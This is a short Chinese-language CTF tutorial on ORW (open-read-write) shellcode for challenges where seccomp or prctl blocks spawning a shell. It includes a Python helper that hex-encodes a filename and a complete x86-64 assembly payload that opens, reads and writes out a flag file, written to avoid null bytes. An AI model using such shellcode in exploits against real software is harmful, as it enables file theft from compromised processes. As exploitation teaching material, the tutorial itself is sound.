什么时候需要orw
有时候题目可以看到有prctl,seccomp就可以大概猜到这个题目不太能直接用system获取shell,对于ctf来说就要用orw(open read write)读取flag
通用payload
一般我们都希望payload比较短,这样方便安放,同时也希望他尽量没有\0,可以实现如下payload
文件名转化函数
可以直接把文件名转化为shellcode里面hex
def convert_str_asmencode(content: str):
out = ""
for i in content:
out = hex(ord(i))[2:] + out
out = "0x" + out
return out
open
这里rsi rdx都为0,因为我们以只读打开flag,这两个对应的是权限
rdi就是指向我们的字符串
xor rsi,rsi;
xor rdx,rdx;
push rdx; #添加\x00,但不会引入\x00
mov rax,{convert_str_asmencode("././flag")}; #这里填写对应的文件名,这里因为要对应hex编码,所以我写了个函数,这里最好文件名凑到8的整数倍,不然会出现\x00
push rax;
mov rdi,rsp;
xor rax,rax;
mov al,2;
syscall;
read
mov rdi,rax;#rdi为文件描述符
mov dl,0x40;#长度
mov rsi,{stack_addr}#保存位置
mov al,0;
syscall;
write
xor rdi,rdi;#因为题目里面标准输入和标准输出都重定向了,所以我们就用标准输入就好
mov al,1;
syscall;
allpayload
shellcode=f"""
xor rsi,rsi;
xor rdx,rdx;
push rdx;
mov rax,{convert_str_asmencode("././flag")};
push rax;
mov rdi,rsp;
xor rax,rax;
mov al,2;
syscall;
mov rdi,rax;
mov dl,0x40;
mov rsi,rsp
mov al,0;
syscall;
xor rdi,rdi;
mov al,1;
syscall;
"""